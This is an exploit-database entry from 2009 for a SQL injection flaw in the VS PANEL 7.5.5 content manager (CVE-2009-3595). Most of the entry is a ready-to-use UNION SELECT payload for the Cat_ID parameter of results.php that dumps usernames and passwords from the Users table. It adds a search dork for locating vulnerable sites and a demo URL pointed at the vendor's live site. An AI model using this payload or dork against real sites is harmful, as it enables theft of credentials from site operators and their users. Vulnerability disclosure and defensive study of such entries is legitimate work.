VS PANEL 7.5.5 - 'results.php?Cat_ID' SQL Injection
Author: C0D3R-Dz
type: webapps
platform: php
port:
date_added: 2009-07-15
date_updated:
verified: 1
codes: OSVDB-56570;CVE-2009-3595
tags:
aliases:
screenshot_url:
application_url:
####################################
# Homepage: http://www.vspanel.gr/ #
# Product: VS PANEL v.7.5.5 #
# DeScOvRed By:C0D3R-Dz #
# File: results.php #
# ContACt:cD_@LinUxmAIL.OrG #
# Dork: "Powered by VS PANEL 7.5.5"#
###################################
################################### SQL Injection#####################################
# results.php?Cat_ID=-6+union+select+1,concat(username,0x3a,password),3,4+from+Users--#
#######################################################################################
################################### DeMo ############################################################
#www.vspanel.gr/results.php?Cat_ID=-6+union+select+1,concat(username,0x3a,password),3,4+from+Users--#
#####################################################################################################
#########################################
#Greetz to:His0K4-HouSsem_PHp-HacKdZ #
# IncluDeR #
#########################################
# milw0rm.com [2009-07-16]